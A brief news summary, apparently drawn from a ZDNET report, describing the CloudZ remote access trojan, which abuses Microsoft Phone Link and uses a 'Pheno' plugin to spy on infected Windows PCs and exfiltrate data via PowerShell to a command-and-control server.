"CloudZ is a modular Remote Access Trojan (RAT), compiled as a .NET executable and equipped with a range of defenses against analysis and reverse engineering, including obfuscation and the detection of debuggers and profilers in its environment."
"The malware loads its instructions into memory during execution, establishes a connection to a command-and-control (C2) server, and executes PowerShell scripts to extract, download, and exfiltrate data to the attacker-controlled C2 server."
"If CloudZ has infected a Windows PC, it can spy on these systems using the newly-discovered 'Pheno' plugin."
The CloudZ Trojan is a Remote Access Trojan (RAT) that exploits Microsoft Phone Link to intercept sensitive information. Active since January 2026, its entry point remains unclear. The malware is a .NET executable with defenses against analysis, loading instructions into memory and connecting to a command-and-control server. It executes PowerShell scripts to exfiltrate data. Microsoft Phone Link, preinstalled on Windows 10 and 11, allows users to connect their phones to PCs, but it is vulnerable to this threat, which can spy on systems using the Pheno plugin.
Read at ZDNET
Unable to calculate read time
Collection
[
|
...
]